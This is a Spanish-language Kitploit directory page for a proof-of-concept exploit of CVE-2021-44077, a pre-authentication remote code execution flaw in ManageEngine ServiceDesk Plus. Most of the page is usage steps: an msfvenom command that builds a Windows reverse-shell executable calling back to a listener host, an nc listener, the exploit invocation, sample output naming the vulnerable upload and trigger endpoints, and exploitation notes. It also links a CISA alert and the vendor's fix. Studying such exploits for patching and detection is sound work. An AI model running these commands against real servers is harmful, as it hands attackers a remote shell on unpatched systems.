Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44077 — Exploit de Prueba de Concepto para ManageEngine ServiceDesk Plus CVE-2021-44077 | Kitploit
Herramientas/GitHubGitHub/horizon3ai/cve-2021-44077
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

Exploit de Prueba de Concepto para ManageEngine ServiceDesk Plus CVE-2021-44077

Ver Repositorio
369hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44077

Exploit de Prueba de Concepto para CVE-2021-44077: RCE PreAuth en ManageEngine ServiceDesk Plus < 11306

Basado en:

  • https://xz.aliyun.com/t/10631

Aviso de CISA:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Remediación (Actualice a Build 11306 o posterior):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

Probado en ManageEngine ServiceDesk Plus Build 11303. Todo el antivirus deshabilitado.

Uso

El exploit sube un ejecutable de Windows al objetivo y lo ejecuta.

Para explotar la vulnerabilidad, primero genere cualquier ejecutable. Por ejemplo:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

Ejecute pip install con el archivo de requisitos o asegúrese de tener el paquete requests.

Si está intentando recibir una reverse shell, ejecute primero su listener, p. ej.:

root@kitploit:~
nc -l 4444

Luego ejecute el script del exploit, pasando los argumentos url y exe, p. ej.:

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

Ejemplo de salida del script:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Prueba

Notas del exploit

  • La vulnerabilidad le permite subir cualquier archivo al directorio bin de instalación, incluidos archivos existentes como scripts por lotes. Puede haber otras formas de invocar el archivo subido.
  • Subir directamente un web shell parece estar bloqueado por un filtro.

Descargo de responsabilidad

Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas eficaces, y no está destinado a atacar sistemas salvo que se cuente con autorización explícita. Los mantenedores del proyecto no se hacen responsables del uso indebido del software. Úselo de forma responsable.

Descargar herramienta